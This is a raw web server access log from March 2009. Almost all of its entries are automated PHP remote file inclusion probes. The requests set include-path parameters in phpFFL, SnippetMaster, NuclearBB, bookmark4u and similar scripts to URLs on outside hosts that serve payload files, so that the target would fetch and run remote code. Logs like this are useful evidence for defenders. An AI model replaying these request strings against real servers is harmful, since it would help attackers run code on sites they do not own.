217.21.209.8 - - [22/Mar/2009:10:27:14 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:10:27:14 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:10:27:14 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:10:27:35 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:10:27:36 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:10:27:36 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:10:27:36 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:27:42 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:27:42 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:27:42 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:10:27:51 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:28:01 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:10:28:10 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:10:28:23 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:28:29 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
94.23.17.145 - - [22/Mar/2009:10:30:59 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
94.23.17.145 - - [22/Mar/2009:10:30:59 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
94.23.17.145 - - [22/Mar/2009:10:30:59 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
94.23.17.145 - - [22/Mar/2009:10:30:59 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.191.89.65 - - [22/Mar/2009:10:31:25 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://members.mywave.at/m206111aa/cms/administrator/components/com_mkpostman/includes/v4id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
88.191.89.65 - - [22/Mar/2009:10:31:26 -0500] "GET /lostpasswd.php?env[include_prefix]=http://members.mywave.at/m206111aa/cms/administrator/components/com_mkpostman/includes/v4id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.101.4.49 - - [22/Mar/2009:10:42:36 -0500] "GET /logs//?GALLERY_BASEDIR=http://weko.co.kr/data/file/notice/test.txt??? HTTP/1.1" 200 182577 "-""libwww-perl/5.79"
87.101.4.49 - - [22/Mar/2009:10:42:36 -0500] "GET //?GALLERY_BASEDIR=http://weko.co.kr/data/file/notice/test.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
89.111.184.103 - - [22/Mar/2009:10:47:02 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:10:47:02 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:10:47:03 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:10:47:35 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
70.38.71.140 - - [22/Mar/2009:10:50:40 -0500] "GET /logs//components/errors.php?error=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
70.38.71.140 - - [22/Mar/2009:10:50:40 -0500] "GET //components/errors.php?error=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
82.194.85.45 - - [22/Mar/2009:10:52:03 -0500] "GET /logs//components/errors.php?error=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
82.194.85.45 - - [22/Mar/2009:10:52:03 -0500] "GET //components/errors.php?error=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
72.232.182.162 - - [22/Mar/2009:10:52:04 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://albozscan.t35.com/albozid.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.823"
72.232.182.162 - - [22/Mar/2009:10:52:04 -0500] "GET //Neos_Chronos/header.php?base_folder=http://albozscan.t35.com/albozid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.823"
212.112.227.88 - - [22/Mar/2009:10:55:27 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
212.112.227.88 - - [22/Mar/2009:10:55:27 -0500] "GET /lostpasswd.php?env[include_prefix]=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
121.78.88.237 - - [22/Mar/2009:10:55:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:10:55:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:10:55:37 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:10:56:52 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
206.220.64.3 - - [22/Mar/2009:10:57:22 -0500] "GET /logs//cn-n/bbs//skin/zero_vote/ask_password.php?dir=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
206.220.64.3 - - [22/Mar/2009:10:57:22 -0500] "GET //cn-n/bbs//skin/zero_vote/ask_password.php?dir=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.230.21.133 - - [22/Mar/2009:11:01:13 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:11:01:13 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
208.76.222.178 - - [22/Mar/2009:11:03:20 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.76.222.178 - - [22/Mar/2009:11:03:20 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.76.222.178 - - [22/Mar/2009:11:03:20 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
208.76.222.178 - - [22/Mar/2009:11:03:38 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:11:07:26 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:11:07:26 -0500] "GET /logs/access_log.1235952000/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:11:07:26 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:11:07:26 -0500] "GET /logs/access_log.1236038400/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:11:08:15 -0500] "GET /logs/access_log.1235952000/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:11:08:15 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:11:08:15 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:11:08:15 -0500] "GET /logs/access_log.1236038400/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:08:31 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:08:31 -0500] "GET /logs/access_log.1236038400/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:08:31 -0500] "GET /logs/access_log.1235952000/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:08:31 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:11:09:36 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:11:09:36 -0500] "GET /logs/access_log.1235952000/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:11:09:36 -0500] "GET /logs/access_log.1236038400/NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.21.209.8 - - [22/Mar/2009:11:09:36 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:10:47 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:10:47 -0500] "GET /logs/access_log.1235952000/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:10:47 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:10:47 -0500] "GET /logs/access_log.1236038400/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:11:35 -0500] "GET /logs/access_log.1235952000/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:11:35 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:11:35 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:11:11:35 -0500] "GET /logs/access_log.1236038400/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
62.210.190.242 - - [22/Mar/2009:11:13:32 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://viparenda.ru/includes/images/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
62.210.190.242 - - [22/Mar/2009:11:13:32 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://viparenda.ru/includes/images/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
72.232.182.162 - - [22/Mar/2009:11:14:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://albozscan.t35.com/albozid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.823"
72.232.182.162 - - [22/Mar/2009:11:14:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://albozscan.t35.com/albozid.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.823"
200.234.200.134 - - [22/Mar/2009:11:18:16 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tkysms.org/.cache/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.234.200.134 - - [22/Mar/2009:11:18:16 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tkysms.org/.cache/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.221.130.6 - - [22/Mar/2009:11:18:34 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:11:18:34 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:11:18:34 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:11:18:38 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
216.15.161.2 - - [22/Mar/2009:11:18:45 -0500] "GET /?_GET[DOCUMENT_ROOT]=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.15.161.2 - - [22/Mar/2009:11:18:47 -0500] "GET /?_GET[DOCUMENT_ROOT]=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.15.161.2 - - [22/Mar/2009:11:18:50 -0500] "GET /logs/access_log.1235347200/?_GET[DOCUMENT_ROOT]=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.15.161.2 - - [22/Mar/2009:11:18:51 -0500] "GET /logs/?_GET[DOCUMENT_ROOT]=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 200 182572 "-""Mozilla/5.0"
216.15.161.2 - - [22/Mar/2009:11:18:51 -0500] "GET /logs/access_log.1235347200/?_GET[DOCUMENT_ROOT]=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.15.161.2 - - [22/Mar/2009:11:18:52 -0500] "GET /logs/?_GET[DOCUMENT_ROOT]=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 200 182572 "-""Mozilla/5.0"
80.68.61.100 - - [22/Mar/2009:11:18:55 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.15.161.2 - - [22/Mar/2009:11:18:55 -0500] "GET /logs/access_log.1235433600/?_GET[DOCUMENT_ROOT]=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
80.68.61.100 - - [22/Mar/2009:11:18:57 -0500] "GET /lostpasswd.php?env[include_prefix]=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
216.15.161.2 - - [22/Mar/2009:11:18:57 -0500] "GET /logs/access_log.1235433600/?_GET[DOCUMENT_ROOT]=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
151.1.24.160 - - [22/Mar/2009:11:26:26 -0500] "GET /logs//components/errors.php?error=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
151.1.24.160 - - [22/Mar/2009:11:26:35 -0500] "GET //components/errors.php?error=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
72.232.182.162 - - [22/Mar/2009:11:27:39 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://nuestroenlace.com/photos/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.823"
72.232.182.162 - - [22/Mar/2009:11:27:39 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://nuestroenlace.com/photos/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.823"
62.210.190.242 - - [22/Mar/2009:11:29:02 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://viparenda.ru/includes/images/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
62.210.190.242 - - [22/Mar/2009:11:29:02 -0500] "GET //config/dbutil.bck.php?confdir=http://viparenda.ru/includes/images/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
173.10.217.18 - - [22/Mar/2009:11:29:18 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://drijijari.fileave.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:11:29:18 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://drijijari.fileave.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:11:29:18 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://drijijari.fileave.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:11:29:31 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://drijijari.fileave.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:11:33:19 -0500] "GET //modules/xoopsgallery/errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:11:33:19 -0500] "GET /logs/access_log.1233964800//modules/xoopsgallery/errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:11:33:19 -0500] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.232.182.162 - - [22/Mar/2009:11:33:27 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://nuestroenlace.com/photos/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.823"
72.232.182.162 - - [22/Mar/2009:11:33:27 -0500] "GET //config/dbutil.bck.php?confdir=http://nuestroenlace.com/photos/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.823"
61.110.18.100 - - [22/Mar/2009:11:36:25 -0500] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:11:36:25 -0500] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:11:36:25 -0500] "GET /logs/access_log.1235865600/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:11:36:40 -0500] "GET /logs/access_log.1235692800/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:11:37:02 -0500] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:11:37:02 -0500] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:11:37:02 -0500] "GET /logs/access_log.1235865600/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:11:37:18 -0500] "GET /logs/access_log.1235692800/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:11:38:09 -0500] "GET /logs/access_log.1236124800/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:11:39:52 -0500] "GET /logs/access_log.1236124800/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:11:53:48 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
203.251.81.216 - - [22/Mar/2009:11:53:48 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
122.116.178.20 - - [22/Mar/2009:11:54:51 -0500] "GET /errors.php?error=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
122.116.178.20 - - [22/Mar/2009:11:54:51 -0500] "GET /logs/errors.php?error=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
122.116.178.20 - - [22/Mar/2009:11:54:51 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.210.190.242 - - [22/Mar/2009:11:55:50 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://viparenda.ru/includes/images/id.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
62.210.190.242 - - [22/Mar/2009:11:55:50 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://viparenda.ru/includes/images/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
